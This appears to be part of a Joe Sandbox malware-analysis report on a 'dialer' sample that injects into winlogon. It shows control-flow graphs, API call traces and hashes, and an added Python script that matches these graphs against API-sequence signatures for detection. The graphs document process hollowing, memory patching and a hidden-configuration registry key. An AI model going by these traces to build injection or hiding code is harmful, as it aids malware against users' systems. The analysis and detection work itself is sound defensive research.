                                                         • 294: 140001dd2-140001def, VirtualAlloc -> 287, 296
                                                         • 295: 140001d89 -> 297
                                                         • 296: 140001df1-140001e07, GetThreadContext -> 287, 299
                                                         • 297: 140001d8c-140001dba, WriteProcessMemory -> 287, 298
                                                         • 298: 140001dc0-140001dcc -> 297, 300
                                                         • 299: 140001e09-140001e2e, WriteProcessMemory -> 287, 301
                                                         • 300: 140001dce -> 294
                                                         • 301: 140001e30-140001e4c, SetThreadContext -> 287, 302
                                                         • 302: 140001e4e-140001e5b, ResumeThread -> 287, 303
                                                         • 303: 140001eba-140001ebf -> 289
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
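
Three of the control-flow graphs in this section are worth matching mechanically: the named-pipe server at 1400021d0 (ConnectNamedPipe, ReadFile, DisconnectNamedPipe, then back to ConnectNamedPipe), the K32EnumProcesses/Sleep loop at 140002b38, and the function at 140001c88 that creates a process, allocates and writes into it, rewrites a thread context and resumes the thread, with an OpenProcess/TerminateProcess path on the failure branch. The following is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses the raw control_flow_graph text Joe Sandbox exports per function (the three dumps from this section are embedded as input, copied as exported), orders API calls by block address, and matches ordered API subsequences plus loop edges against signatures. The signature names process_hollowing, named_pipe_server_loop and process_enumeration_loop are this example's own labels, not Joe Sandbox's.

```python
"""Match Joe Sandbox control_flow_graph dumps against API-sequence signatures."""
import re
from dataclasses import dataclass, field

# Export grammar: "<id> <start>[-<end>]" opens a block, "call <addr>" records a subcall,
# "<a>-><b>" is an edge, and any other token inside a block is an API name.
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    node: int
    start: int
    end: int
    apis: list = field(default_factory=list)
    subcalls: list = field(default_factory=list)


def parse_cfg(text):
    """Return ({node_id: Block}, [(src, dst), ...]) for one control_flow_graph dump."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif t == "call" and cur is not None and i + 1 < len(toks):
            i += 1
            cur.subcalls.append(int(toks[i], 16))
        elif NODE_ID.match(t) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")   # single-address blocks have no "-"
            cur = Block(int(t), int(lo, 16), int(hi or lo, 16))
            blocks[cur.node] = cur
            i += 1
        elif cur is not None:
            cur.apis.append(t)
        i += 1
    return blocks, edges


def api_sequence(blocks):
    """API names in block-address order, a cheap stand-in for execution order."""
    return [a for b in sorted(blocks.values(), key=lambda b: b.start) for a in b.apis]


def in_order(seq, pattern):
    """True if every name in pattern occurs in seq in that order (gaps allowed)."""
    it = iter(seq)
    return all(any(a == want for a in it) for want in pattern)


def has_back_edge(blocks, edges, from_api, to_api):
    """True if a block calling from_api jumps to a lower-address block calling to_api."""
    return any(from_api in blocks[s].apis and to_api in blocks[d].apis
               and blocks[d].start < blocks[s].start
               for s, d in edges if s in blocks and d in blocks)


# Signature names are this example's own labels, not Joe Sandbox's.
SIGNATURES = {
    "process_hollowing": {"order": ["CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
                                    "GetThreadContext", "SetThreadContext", "ResumeThread"]},
    "named_pipe_server_loop": {"order": ["ConnectNamedPipe", "ReadFile", "DisconnectNamedPipe"],
                               "loop": ("DisconnectNamedPipe", "ConnectNamedPipe")},
    "process_enumeration_loop": {"order": ["K32EnumProcesses", "Sleep"],
                                 "loop": ("Sleep", "K32EnumProcesses")},
}


def classify(cfg_text):
    """Sorted names of the signatures one control_flow_graph dump satisfies."""
    blocks, edges = parse_cfg(cfg_text)
    seq = api_sequence(blocks)
    return sorted(name for name, sig in SIGNATURES.items()
                  if in_order(seq, sig["order"])
                  and ("loop" not in sig or has_back_edge(blocks, edges, *sig["loop"])))


# Inputs: three dumps from this report section, copied as Joe Sandbox exports them.
PIPE_SERVER_CFG = """control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54
128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133
132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135
136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137
136->133 137->136 138 140002236-14000223f 137->138 138->136"""
ENUM_CFG = """control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc
149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150
151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153
151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151
156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157
158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158"""
HOLLOWING_CFG = """control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281
282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281
286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282
287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288
289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291
288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293
291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287
296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297
296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298
298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294
301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303
303->289"""

if __name__ == "__main__":
    for label, cfg in (("pipe server", PIPE_SERVER_CFG), ("process enum", ENUM_CFG),
                       ("hollowing", HOLLOWING_CFG)):
        print(label, classify(cfg))
```

Block-address order only approximates execution order; it is good enough for these straight-line functions, but a branchy function should be walked along its edges from the entry block instead. The back-edge check is what separates a pipe server that loops on ConnectNamedPipe from a one-shot client read, and the same idea applies to the enumeration loop that re-runs K32EnumProcesses after every Sleep.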

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                        Execution Graph

                                                        Execution Coverage:1%
                                                        Dynamic/Decrypted Code Coverage:94.6%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:112
                                                        Total number of Limit Nodes:18
                                                        execution_graph 29689 225dc67273c 29690 225dc67276a 29689->29690 29691 225dc6727c5 VirtualAlloc 29690->29691 29692 225dc6727ec 29690->29692 29691->29692 29693 225dc643ab9 29694 225dc643a06 29693->29694 29695 225dc643a56 VirtualQuery 29694->29695 29696 225dc643a8a VirtualAlloc 29694->29696 29698 225dc643a70 29694->29698 29695->29694 29695->29698 29697 225dc643abb GetLastError 29696->29697 29696->29698 29697->29694 29697->29698 29699 225dc641abc 29704 225dc641628 GetProcessHeap 29699->29704 29701 225dc641ad2 Sleep SleepEx 29702 225dc641acb 29701->29702 29702->29701 29703 225dc641598 StrCmpIW StrCmpW 29702->29703 29703->29702 29705 225dc641648 __std_exception_copy 29704->29705 29749 225dc641268 GetProcessHeap 29705->29749 29707 225dc641650 29708 225dc641268 2 API calls 29707->29708 29709 225dc641661 29708->29709 29710 225dc641268 2 API calls 29709->29710 29711 225dc64166a 29710->29711 29712 225dc641268 2 API calls 29711->29712 29713 225dc641673 29712->29713 29714 225dc64168e RegOpenKeyExW 29713->29714 29715 225dc6418a6 29714->29715 29716 225dc6416c0 RegOpenKeyExW 29714->29716 29715->29702 29717 225dc6416e9 29716->29717 29718 225dc6416ff RegOpenKeyExW 29716->29718 29760 225dc6412bc 13 API calls __std_exception_copy 29717->29760 29719 225dc64173a RegOpenKeyExW 29718->29719 29720 225dc641723 29718->29720 29723 225dc641775 RegOpenKeyExW 29719->29723 29724 225dc64175e 29719->29724 29753 225dc64104c RegQueryInfoKeyW 29720->29753 29728 225dc641799 29723->29728 29729 225dc6417b0 RegOpenKeyExW 29723->29729 29761 225dc6412bc 13 API calls __std_exception_copy 29724->29761 29725 225dc6416f5 RegCloseKey 29725->29718 29762 225dc6412bc 13 API calls __std_exception_copy 29728->29762 29732 225dc6417eb RegOpenKeyExW 29729->29732 29733 225dc6417d4 29729->29733 29730 225dc64176b RegCloseKey 29730->29723 29734 225dc641826 RegOpenKeyExW 29732->29734 29735 225dc64180f 29732->29735 29763 225dc6412bc 13 API calls __std_exception_copy 
29733->29763 29739 225dc64184a 29734->29739 29740 225dc641861 RegOpenKeyExW 29734->29740 29738 225dc64104c 5 API calls 29735->29738 29736 225dc6417a6 RegCloseKey 29736->29729 29742 225dc64181c RegCloseKey 29738->29742 29743 225dc64104c 5 API calls 29739->29743 29744 225dc64189c RegCloseKey 29740->29744 29745 225dc641885 29740->29745 29741 225dc6417e1 RegCloseKey 29741->29732 29742->29734 29746 225dc641857 RegCloseKey 29743->29746 29744->29715 29747 225dc64104c 5 API calls 29745->29747 29746->29740 29748 225dc641892 RegCloseKey 29747->29748 29748->29744 29764 225dc656168 29749->29764 29751 225dc641283 GetProcessHeap 29752 225dc6412ae __std_exception_copy 29751->29752 29752->29707 29754 225dc6411b5 RegCloseKey 29753->29754 29755 225dc6410bf 29753->29755 29754->29719 29755->29754 29756 225dc6410cf RegEnumValueW 29755->29756 29758 225dc641125 __std_exception_copy 29756->29758 29757 225dc64114e GetProcessHeap 29757->29758 29758->29754 29758->29756 29758->29757 29759 225dc64116e GetProcessHeap HeapFree 29758->29759 29759->29758 29760->29725 29761->29730 29762->29736 29763->29741 29765 225dc61273c 29767 225dc61276a 29765->29767 29766 225dc6128d4 29767->29766 29768 225dc6127c5 VirtualAlloc 29767->29768 29768->29766 29769 225dc6127ec 29768->29769 29769->29766 29770 225dc612858 LoadLibraryA 29769->29770 29770->29769 29771 225dc6428c8 29772 225dc64290e 29771->29772 29773 225dc642970 29772->29773 29775 225dc643844 29772->29775 29776 225dc643866 29775->29776 29777 225dc643851 StrCmpNIW 29775->29777 29776->29772 29777->29776 29778 225dc64554d 29780 225dc645554 29778->29780 29779 225dc6455bb 29780->29779 29781 225dc645637 VirtualProtect 29780->29781 29782 225dc645671 29781->29782 29783 225dc645663 GetLastError 29781->29783 29783->29782 29784 225dc6ad6cc 29789 225dc6ad6dd _invalid_parameter_noinfo 29784->29789 29785 225dc6ad72e 29790 225dc6ad6ac 6 API calls __std_exception_copy 29785->29790 29786 225dc6ad712 HeapAlloc 29787 225dc6ad72c 29786->29787 29786->29789 29789->29785 
29789->29786 29790->29787 29791 225dc645cf0 29792 225dc645cfd 29791->29792 29793 225dc645d09 29792->29793 29803 225dc645e1a 29792->29803 29794 225dc645d3e 29793->29794 29795 225dc645d8d 29793->29795 29796 225dc645d66 SetThreadContext 29794->29796 29796->29795 29797 225dc645e41 VirtualProtect FlushInstructionCache 29797->29803 29798 225dc645efe 29799 225dc645f1e 29798->29799 29813 225dc6443e0 VirtualFree 29798->29813 29809 225dc644df0 GetCurrentProcess 29799->29809 29801 225dc645f23 29804 225dc645f77 29801->29804 29805 225dc645f37 ResumeThread 29801->29805 29803->29797 29803->29798 29814 225dc647940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 29804->29814 29806 225dc645f6b 29805->29806 29806->29801 29808 225dc645fbf 29810 225dc644e0c 29809->29810 29811 225dc644e22 VirtualProtect FlushInstructionCache 29810->29811 29812 225dc644e53 29810->29812 29811->29810 29812->29801 29813->29799 29814->29808

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 406a7c028b3c229bdc1c75f8301e19e1701b13e4dfdd540bc7c265abecc9bc67
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 47712D7E328E60A6EB109FA9E85869D33B4F784F9AF509111DE4E47B69EF34C444C740

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5b5ece5b16f05410ef88fc7334ca4b30fcb2165cfe8f9a178b0778bd0effcbe9
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 96118B2A318F5493EF549BA9E408269B2A0FB88F86F148038DF8A03B94EF3DC505C704

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 59 225dc645b30-225dc645b57 60 225dc645b59-225dc645b68 59->60 61 225dc645b6b-225dc645b76 GetCurrentThreadId 59->61 60->61 62 225dc645b78-225dc645b7d 61->62 63 225dc645b82-225dc645b89 61->63 64 225dc645faf-225dc645fc6 call 225dc647940 62->64 65 225dc645b9b-225dc645baf 63->65 66 225dc645b8b-225dc645b96 call 225dc645960 63->66 69 225dc645bbe-225dc645bc4 65->69 66->64 72 225dc645bca-225dc645bd3 69->72 73 225dc645c95-225dc645cb6 69->73 75 225dc645c1a-225dc645c8d call 225dc644510 call 225dc6444b0 call 225dc644470 72->75 76 225dc645bd5-225dc645c18 call 225dc6485c0 72->76 78 225dc645cbc-225dc645cdc GetThreadContext 73->78 79 225dc645e1f-225dc645e30 call 225dc6474bf 73->79 87 225dc645c90 75->87 76->87 83 225dc645e1a 78->83 84 225dc645ce2-225dc645d03 78->84 90 225dc645e35-225dc645e3b 79->90 83->79 84->83 93 225dc645d09-225dc645d12 84->93 87->69 94 225dc645e41-225dc645e98 VirtualProtect FlushInstructionCache 90->94 95 225dc645efe-225dc645f0e 90->95 97 225dc645d92-225dc645da3 93->97 98 225dc645d14-225dc645d25 93->98 101 225dc645ec9-225dc645ef9 call 225dc6478ac 94->101 102 225dc645e9a-225dc645ea4 94->102 106 225dc645f1e-225dc645f2a call 225dc644df0 95->106 107 225dc645f10-225dc645f17 95->107 103 225dc645e15 97->103 104 225dc645da5-225dc645dc3 97->104 99 225dc645d27-225dc645d3c 98->99 100 225dc645d8d 98->100 99->100 108 225dc645d3e-225dc645d88 call 225dc643970 SetThreadContext 99->108 100->103 101->90 102->101 109 225dc645ea6-225dc645ec1 call 225dc644390 102->109 104->103 110 225dc645dc5-225dc645e10 call 225dc643900 call 225dc6474dd 104->110 120 225dc645f2f-225dc645f35 106->120 107->106 112 225dc645f19 call 225dc6443e0 107->112 108->100 109->101 110->103 112->106 124 225dc645f77-225dc645f95 120->124 125 225dc645f37-225dc645f75 ResumeThread call 225dc6478ac 120->125 128 225dc645fa9 124->128 129 225dc645f97-225dc645fa6 124->129 125->120 128->64 129->128
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction ID: f245da02ec037058e9828f5728e6f8f7909b60f63258dcba4de34453af5a61e8
                                                        • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction Fuzzy Hash: B9D1997A20CF9896DA70DB4AE49835A7BA0F7C8B85F104156EACE47BA5DF3CC541CB40

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 131 225dc6450d0-225dc6450fc 132 225dc64510d-225dc645116 131->132 133 225dc6450fe-225dc645106 131->133 134 225dc645127-225dc645130 132->134 135 225dc645118-225dc645120 132->135 133->132 136 225dc645141-225dc64514a 134->136 137 225dc645132-225dc64513a 134->137 135->134 138 225dc64514c-225dc645151 136->138 139 225dc645156-225dc645161 GetCurrentThreadId 136->139 137->136 140 225dc6456d3-225dc6456da 138->140 141 225dc645163-225dc645168 139->141 142 225dc64516d-225dc645174 139->142 141->140 143 225dc645176-225dc64517c 142->143 144 225dc645181-225dc64518a 142->144 143->140 145 225dc64518c-225dc645191 144->145 146 225dc645196-225dc6451a2 144->146 145->140 147 225dc6451a4-225dc6451c9 146->147 148 225dc6451ce-225dc645225 call 225dc6456e0 * 2 146->148 147->140 153 225dc64523a-225dc645243 148->153 154 225dc645227-225dc64522e 148->154 155 225dc645255-225dc64525e 153->155 156 225dc645245-225dc645252 153->156 157 225dc645236 154->157 158 225dc645230 154->158 159 225dc645273-225dc645298 call 225dc647870 155->159 160 225dc645260-225dc645270 155->160 156->155 157->153 162 225dc6452a6-225dc6452aa 157->162 161 225dc6452b0-225dc6452b6 158->161 172 225dc64532d-225dc645342 call 225dc643cc0 159->172 173 225dc64529e 159->173 160->159 163 225dc6452e5-225dc6452eb 161->163 164 225dc6452b8-225dc6452d4 call 225dc644390 161->164 162->161 167 225dc645315-225dc645328 163->167 168 225dc6452ed-225dc64530c call 225dc6478ac 163->168 164->163 175 225dc6452d6-225dc6452de 164->175 167->140 168->167 178 225dc645351-225dc64535a 172->178 179 225dc645344-225dc64534c 172->179 173->162 175->163 180 225dc64536c-225dc6453ba call 225dc648c60 178->180 181 225dc64535c-225dc645369 178->181 179->162 184 225dc6453c2-225dc6453ca 180->184 181->180 185 225dc6454d7-225dc6454df 184->185 186 225dc6453d0-225dc6454bb call 225dc647440 184->186 188 225dc6454e1-225dc6454f4 call 225dc644590 185->188 189 225dc645523-225dc64552b 185->189 197 225dc6454bd 
186->197 198 225dc6454bf-225dc6454ce call 225dc644060 186->198 203 225dc6454f6 188->203 204 225dc6454f8-225dc645521 188->204 192 225dc645537-225dc645546 189->192 193 225dc64552d-225dc645535 189->193 195 225dc645548 192->195 196 225dc64554f 192->196 193->192 194 225dc645554-225dc645561 193->194 200 225dc645563 194->200 201 225dc645564-225dc6455b9 call 225dc6485c0 194->201 195->196 196->194 197->185 208 225dc6454d2 198->208 209 225dc6454d0 198->209 200->201 210 225dc6455bb-225dc6455c3 201->210 211 225dc6455c8-225dc645661 call 225dc644510 call 225dc644470 VirtualProtect 201->211 203->189 204->185 208->184 209->185 216 225dc645671-225dc6456d1 211->216 217 225dc645663-225dc645668 GetLastError 211->217 216->140 217->216
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction ID: ca8f9a462bd9996edb27ee4ecd3a9b3d43bbe2f9124c1ca87dd336038b8394af
                                                        • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction Fuzzy Hash: 1102C83661DF9496EB60CB99E49436AB7A1F3C4795F104056EA8E87BA8DF7CC444CF00

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: 3d7c28a49f1379a387e1eab8d3c47744672dc9424a01523034e22865a73a9f88
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: 7F31302625DE98A1EA30DB9DE05835E76A1F388B85F108575F6CF46BA8DF7CC180CB04

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 7d3d60018f90cf45d3bc6b126cf75a44508ad4678cf0a9f52ef5460c3c2565a3
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 7011C07C62CEA8B2FB619BE8F90C3993295AB54B47F50C1B4EB0781690EF78C044C240

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction ID: 7e590623df8fc7209075b22fdaf8685971673eb90f371bc8902be2096d1f9670
